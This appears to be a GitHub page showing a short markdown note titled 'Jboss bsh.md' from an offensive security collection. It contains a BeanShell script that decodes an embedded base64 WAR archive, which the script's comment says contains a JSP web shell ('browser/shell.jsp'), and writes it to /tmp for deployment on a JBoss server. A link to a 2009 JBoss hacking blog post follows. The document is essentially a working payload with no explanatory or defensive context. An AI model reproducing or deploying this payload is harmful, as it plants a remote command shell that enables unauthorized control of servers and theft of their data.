Skip to content

Latest commit

 

History

History
5 lines (3 loc) · 4.61 KB

Jboss bsh.md

File metadata and controls

5 lines (3 loc) · 4.61 KB

//browser.war - access browser/shell.jsp import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val = "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"; BASE64Decoder decoder = new BASE64Decoder(); byte[] byteval = decoder.decodeBuffer(val); FileOutputStream fstream = new FileOutputStream("/tmp/browser.war"); fstream.write(byteval); fstream.close();

https://techblog.mediaservice.net/2009/07/more-jboss-hacking/